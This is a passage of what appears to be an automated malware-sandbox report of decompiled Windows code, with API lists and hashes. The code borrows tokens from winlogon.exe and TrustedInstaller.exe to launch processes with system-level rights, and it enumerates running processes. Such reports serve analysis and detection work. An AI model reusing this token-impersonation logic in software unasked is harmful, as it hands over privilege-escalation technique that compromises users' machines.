							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                      0x00408533
                                                                                      0x00408533
                                                                                      0x00408536
                                                                                      0x0040853e
                                                                                      0x00408546
                                                                                      0x0040854d
                                                                                      0x00408559
                                                                                      0x00408563
                                                                                      0x00408569
                                                                                      0x00408572
                                                                                      0x00408583
                                                                                      0x0040858d
                                                                                      0x00408595
                                                                                      0x0040859e
                                                                                      0x004085a2
                                                                                      0x004085a6
                                                                                      0x004085aa
                                                                                      0x004085ae
                                                                                      0x004085b8
                                                                                      0x004085c1
                                                                                      0x004085c8
                                                                                      0x004085cd
                                                                                      0x004085cf
                                                                                      0x0040867f
                                                                                      0x00408688
                                                                                      0x0040868d
                                                                                      0x0040868f
                                                                                      0x00408730
                                                                                      0x00408735
                                                                                      0x00408737
                                                                                      0x0040873d
                                                                                      0x00408750
                                                                                      0x0040875d
                                                                                      0x00408763
                                                                                      0x00408770
                                                                                      0x00408775
                                                                                      0x00408779
                                                                                      0x0040878b
                                                                                      0x00408790
                                                                                      0x004087a2
                                                                                      0x004087aa
                                                                                      0x004087b8
                                                                                      0x004087be
                                                                                      0x004087c3
                                                                                      0x004087c9
                                                                                      0x004087d2
                                                                                      0x004087df
                                                                                      0x004087e3
                                                                                      0x004087e6
                                                                                      0x00408801
                                                                                      0x004087e8
                                                                                      0x004087f8
                                                                                      0x004087fe
                                                                                      0x00408811
                                                                                      0x00408816
                                                                                      0x00408816
                                                                                      0x0040881c
                                                                                      0x00408822
                                                                                      0x00408779
                                                                                      0x00408824
                                                                                      0x00408829
                                                                                      0x00408833
                                                                                      0x00408834
                                                                                      0x00408840
                                                                                      0x00408848
                                                                                      0x0040884c
                                                                                      0x00408850
                                                                                      0x00408855
                                                                                      0x0040885a
                                                                                      0x00408860
                                                                                      0x004088ac
                                                                                      0x004088b1
                                                                                      0x004088b3
                                                                                      0x004088bf
                                                                                      0x004088c5
                                                                                      0x004088cb
                                                                                      0x004088da
                                                                                      0x004088ea
                                                                                      0x004088ed
                                                                                      0x004088f8
                                                                                      0x004088ff
                                                                                      0x00408905
                                                                                      0x004088b5
                                                                                      0x004088b5
                                                                                      0x004088b5
                                                                                      0x00000000
                                                                                      0x00408862
                                                                                      0x00408862
                                                                                      0x0040886d
                                                                                      0x00408874
                                                                                      0x0040887b
                                                                                      0x00408882
                                                                                      0x00408889
                                                                                      0x00408895
                                                                                      0x00408897
                                                                                      0x00408658
                                                                                      0x00408658
                                                                                      0x0040865d
                                                                                      0x00408661
                                                                                      0x0040866a
                                                                                      0x00408673
                                                                                      0x00408678
                                                                                      0x00000000
                                                                                      0x00408678
                                                                                      0x00408860
                                                                                      0x00408695
                                                                                      0x00408695
                                                                                      0x0040869f
                                                                                      0x004086a2
                                                                                      0x004086af
                                                                                      0x004086a4
                                                                                      0x004086a7
                                                                                      0x004086a7
                                                                                      0x004086b4
                                                                                      0x004086bf
                                                                                      0x004086cb
                                                                                      0x004086d3
                                                                                      0x004086d7
                                                                                      0x004086db
                                                                                      0x004086e0
                                                                                      0x004086f1
                                                                                      0x004086f8
                                                                                      0x004086ff
                                                                                      0x00408706
                                                                                      0x0040870d
                                                                                      0x00408719
                                                                                      0x0040871b
                                                                                      0x00000000
                                                                                      0x0040871b
                                                                                      0x004085d5
                                                                                      0x004085da
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004085ec
                                                                                      0x004085ef
                                                                                      0x004085f6
                                                                                      0x004085fd
                                                                                      0x00408604
                                                                                      0x0040860b
                                                                                      0x00408612
                                                                                      0x00408616
                                                                                      0x00408620
                                                                                      0x0040862a
                                                                                      0x00408632
                                                                                      0x00408633
                                                                                      0x00408638
                                                                                      0x0040864a
                                                                                      0x0040864f
                                                                                      0x00408651
                                                                                      0x00000000
                                                                                      0x0040854f
                                                                                      0x0040854f
                                                                                      0x00408550
                                                                                      0x00408556
                                                                                      0x00408556

                                                                                      APIs
                                                                                        • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                        • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                        • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                        • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                      • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                      • swscanf.MSVCRT ref: 00408620
                                                                                      • _wtoi.MSVCRT ref: 00408633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                      • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                      • API String ID: 3933224404-3784219877
                                                                                      • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                      • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                      • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                      • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 81%
                                                                                      			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                      0x00401fe6
                                                                                      0x00401ff1
                                                                                      0x00401ff3
                                                                                      0x00401fff
                                                                                      0x00402002
                                                                                      0x004020a8
                                                                                      0x004020ab
                                                                                      0x004020f3
                                                                                      0x004020f6
                                                                                      0x00402162
                                                                                      0x00402165
                                                                                      0x004021f2
                                                                                      0x004021f5
                                                                                      0x00402235
                                                                                      0x00402238
                                                                                      0x004022be
                                                                                      0x0040223a
                                                                                      0x0040223a
                                                                                      0x00402240
                                                                                      0x0040224b
                                                                                      0x0040224e
                                                                                      0x00402251
                                                                                      0x00402254
                                                                                      0x00402259
                                                                                      0x0040225e
                                                                                      0x00402262
                                                                                      0x00402264
                                                                                      0x00402264
                                                                                      0x00402264
                                                                                      0x00402262
                                                                                      0x00402266
                                                                                      0x0040226c
                                                                                      0x00402271
                                                                                      0x00402274
                                                                                      0x00402276
                                                                                      0x0040229a
                                                                                      0x0040229a
                                                                                      0x00402278
                                                                                      0x00402296
                                                                                      0x00402296
                                                                                      0x0040229c
                                                                                      0x0040229c
                                                                                      0x004022c0
                                                                                      0x004022c2
                                                                                      0x004022c8
                                                                                      0x004022c8
                                                                                      0x004022c8
                                                                                      0x00000000
                                                                                      0x004022c0
                                                                                      0x00402201
                                                                                      0x00402203
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402220
                                                                                      0x00402225
                                                                                      0x00402227
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040222d
                                                                                      0x00000000
                                                                                      0x0040222d
                                                                                      0x00402173
                                                                                      0x00402179
                                                                                      0x0040217b
                                                                                      0x0040217e
                                                                                      0x00402183
                                                                                      0x00402185
                                                                                      0x00402188
                                                                                      0x0040218d
                                                                                      0x0040218f
                                                                                      0x00402192
                                                                                      0x004021a2
                                                                                      0x004021a7
                                                                                      0x004021a9
                                                                                      0x004021ac
                                                                                      0x004021cc
                                                                                      0x004021d1
                                                                                      0x004021d3
                                                                                      0x004021db
                                                                                      0x004021db
                                                                                      0x004021e1
                                                                                      0x004021e1
                                                                                      0x004021e7
                                                                                      0x004021e7
                                                                                      0x00000000
                                                                                      0x00402192
                                                                                      0x004020fe
                                                                                      0x00402103
                                                                                      0x00402105
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402111
                                                                                      0x00402114
                                                                                      0x00000000
                                                                                      0x00402114
                                                                                      0x004020ad
                                                                                      0x004020b4
                                                                                      0x004020b9
                                                                                      0x004020bc
                                                                                      0x00000000
                                                                                      0x004020c2
                                                                                      0x004020c4
                                                                                      0x004020ce
                                                                                      0x004020d0
                                                                                      0x004020d3
                                                                                      0x004020d4
                                                                                      0x004020d5
                                                                                      0x004020e6
                                                                                      0x004020e7
                                                                                      0x004020d7
                                                                                      0x004020d7
                                                                                      0x004020dd
                                                                                      0x004020de
                                                                                      0x004020df
                                                                                      0x004020df
                                                                                      0x004020ec
                                                                                      0x004020ef
                                                                                      0x00000000
                                                                                      0x004020ef
                                                                                      0x00402008
                                                                                      0x00402016
                                                                                      0x0040201d
                                                                                      0x0040202e
                                                                                      0x00402035
                                                                                      0x00402044
                                                                                      0x00402049
                                                                                      0x00402055
                                                                                      0x00402064
                                                                                      0x00402068
                                                                                      0x0040206e
                                                                                      0x0040208b
                                                                                      0x00402070
                                                                                      0x00402082
                                                                                      0x00402088
                                                                                      0x0040209e
                                                                                      0x004020a1
                                                                                      0x00402119
                                                                                      0x00402119
                                                                                      0x0040211b
                                                                                      0x0040211e
                                                                                      0x0040211e
                                                                                      0x00402149
                                                                                      0x00402151
                                                                                      0x00402151
                                                                                      0x00402157
                                                                                      0x00402157
                                                                                      0x004022cb
                                                                                      0x004022d2
                                                                                      0x004022d2

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040201D
                                                                                      • memset.MSVCRT ref: 00402035
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00402050
                                                                                      • wcslen.MSVCRT ref: 0040205F
                                                                                      • wcslen.MSVCRT ref: 004020B4
                                                                                      • _wtoi.MSVCRT ref: 004020D7
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                      • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                        • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                        • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                        • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                        • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                        • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      • wcschr.MSVCRT ref: 00402259
                                                                                      • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                      • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                      • API String ID: 3201562063-2355939583
                                                                                      • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                      • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                      0x00409609
                                                                                      0x0040960f
                                                                                      0x00409619
                                                                                      0x00409623
                                                                                      0x0040962e
                                                                                      0x00409633
                                                                                      0x00409640
                                                                                      0x0040964a
                                                                                      0x00409782
                                                                                      0x0040965a
                                                                                      0x0040965f
                                                                                      0x00409678
                                                                                      0x0040967e
                                                                                      0x00409681
                                                                                      0x00409685
                                                                                      0x00409688
                                                                                      0x004096b2
                                                                                      0x004096bf
                                                                                      0x004096c6
                                                                                      0x004096cb
                                                                                      0x004096da
                                                                                      0x004096e6
                                                                                      0x0040973b
                                                                                      0x00409747
                                                                                      0x0040975f
                                                                                      0x00409764
                                                                                      0x0040976a
                                                                                      0x00409770
                                                                                      0x00409773
                                                                                      0x0040977d
                                                                                      0x00000000
                                                                                      0x0040977d
                                                                                      0x004096ee
                                                                                      0x004096f5
                                                                                      0x004096fc
                                                                                      0x00409704
                                                                                      0x0040970c
                                                                                      0x0040971c
                                                                                      0x0040971c
                                                                                      0x00409704
                                                                                      0x00409721
                                                                                      0x00409728
                                                                                      0x00409739
                                                                                      0x00409739
                                                                                      0x00000000
                                                                                      0x00409728
                                                                                      0x00409693
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004096a5
                                                                                      0x004096a9
                                                                                      0x004096ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004096ac
                                                                                      0x004097a6

                                                                                      APIs
                                                                                        • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                      • memset.MSVCRT ref: 0040962E
                                                                                      • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                      • memset.MSVCRT ref: 004096C6
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                      • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                      • API String ID: 239888749-1740548384
                                                                                      • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                      • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                      0x00409924
                                                                                      0x0040992c
                                                                                      0x00409937
                                                                                      0x0040993f
                                                                                      0x0040994a
                                                                                      0x00409956
                                                                                      0x00409962
                                                                                      0x0040996e
                                                                                      0x00409971
                                                                                      0x00409973
                                                                                      0x00000000
                                                                                      0x00409976
                                                                                      0x00409977

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1529661771-70141382
                                                                                      • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
